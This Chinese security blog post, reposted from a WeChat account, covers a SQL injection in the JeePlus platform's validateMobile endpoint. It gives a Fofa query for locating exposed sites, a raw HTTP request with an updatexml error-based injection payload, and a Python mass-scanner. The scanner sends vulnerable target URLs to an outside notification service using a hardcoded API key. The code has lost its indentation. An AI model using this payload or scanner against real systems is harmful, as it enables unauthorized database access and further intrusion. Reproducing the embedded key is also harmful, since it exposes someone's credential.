漏洞描述
JeePlus快速开发平台 validateMobile SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
漏洞复现
Fofa
app="JeePlus"
部分界面如下
复现过程如下
GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
红岸脚本
核心代码
# JeePlus_validateMobile_SQL_scan.py
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout
import os
import urllib.parse
import urllib.request
import re
import time
import ssl
import urllib
from urllib.parse import urljoin, quote
def sc_send(text, desp='', key='[SENDKEY]'):
postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')
urlserver = f'https://sctapi.ftqq.com/{key}.send'
req = urllib.request.Request(urlserver, data=postdata, method='POST')
with urllib.request.urlopen(req) as response:
result = response.read().decode('utf-8')
return result
key = "SCT212695TeKe1ATgRMkA7f7jyrOOkH9GX"
def scan_JeePlus_validateMobile_SQL(url, proxies, headers, append_to_output):
if url.endswith("/"):
path = "a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
else:
path = "/a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271"
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15',
'Accept-Encoding': 'gzip',
}
encodetext = url + path
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
req = requests.get(encodetext, headers=headers, verify=False, timeout=10, proxies=proxies)
if req.status_code == 500 and 'XPATH' in req.text:
append_to_output(f"[+] {url} 存在JeePlus快速开发平台 validateMobile SQL注入!!!!", "red")
ret = sc_send('JeePlus快速开发平台 validateMobile SQL注入', f"漏洞连接: {url}rn漏洞类型: SQL注入", key)
else:
append_to_output(f"[-] {url} 不存在JeePlus快速开发平台 validateMobile SQL注入", "green")
except Timeout:
append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
except Exception as e:
if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
else:
append_to_output(str(e), "yellow")
原文始发于微信公众号(暗影网安实验室):JeePlus快速开发平台 validateMobile SQL注入
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论